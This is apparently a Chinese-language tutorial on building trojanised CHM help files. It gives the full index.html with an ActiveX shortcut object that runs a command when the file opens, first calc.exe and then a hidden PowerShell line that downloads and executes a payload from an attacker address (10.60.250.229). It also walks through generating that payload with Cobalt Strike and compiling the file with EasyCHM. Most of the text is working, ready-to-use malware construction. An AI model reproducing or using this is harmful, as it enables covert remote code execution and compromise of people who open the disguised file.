一、命令执行(calc)木马生成
1.生成木马
首先创建一个根目录,文件名为exp
在文件夹里创建两个目录和一个index.html文件
在两个目录里分别创建txt文件或html文件
index.html写入以下内容
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x class width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',calc.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>
启动EasyCHM软件,点击新建
点击浏览
选择exp文件夹,点确定
点击工具栏的编译按钮
弹出对话框,点击生成CHM,会在桌面生成一个CHM文件
2.测试
把文件放到目标机器,运行,成功弹出计算器
二、power shell 反向HTTP连接 木马生成
1.启动Colbalt Strike
新建一个payload,点击Cobalt Strike --> Listeners
点击Add
填好Name Host Port,点击save
2.生成木马
点击菜单 attacks --> web Drive by --> scripted web Delovery
type类型设置powershell 单机launch
生成结果
用代码将index.html中的calc.exea替换
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x class width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://10.60.250.229:80/a'))">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>
- 需要将原有的单引号换成双引号
- powershell 后面加入逗号
- IEX前面和对应的双引号删除
- 网址换成单引号
3.测试
编译生成,运行如下